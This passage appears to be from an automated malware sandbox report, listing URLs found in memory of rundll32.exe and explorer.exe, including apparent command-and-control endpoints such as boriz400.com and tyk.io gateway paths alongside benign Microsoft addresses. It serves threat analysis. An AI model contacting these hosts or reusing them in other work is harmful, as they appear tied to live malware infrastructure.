                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                      Source: rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://boriz400.com/
                      Source: rundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921159E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://boriz400.com/api/azure
                      Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://boriz400.com/api/azure8
                      Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://boriz400.com/api/azurey
                      Source: rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://boriz400.com/content.php
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://boriz400.com/qa
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                      Source: explorer.exe, 00000016.00000002.2945125604.000000000B4AE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://illoskanawer.com/live/
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                      Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/
                      Source: rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azure
                      Source: rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php
                      Source: rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php4
                      Source: rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpA
                      Source: rundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpL
                      Source: rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgF
                      Source: rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfE
                      Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/n
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                      Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/
                      Source: rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/5/
                      Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/F
                      Source: rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure
                      Source: rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure(
                      Source: rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.php
                      Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure/j
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure4
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure=
                      Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azureY
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurej
                      Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.php
                      Source: rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&j
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1j
                      Source: rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep://www.
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepP
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjB
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php
                      Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&j
                      Source: rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php(
                      Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php1j
                      Source: rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php4
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phpP
                      Source: rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/f
                      Source: rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000016.00000000.1859052974.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C54A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/
                      Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/live/
                      Source: explorer.exe, 00000016.00000002.2943554599.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/live/0vaH
                      Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/live/6
                      Source: explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://workspacin.cloud/live/J5
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
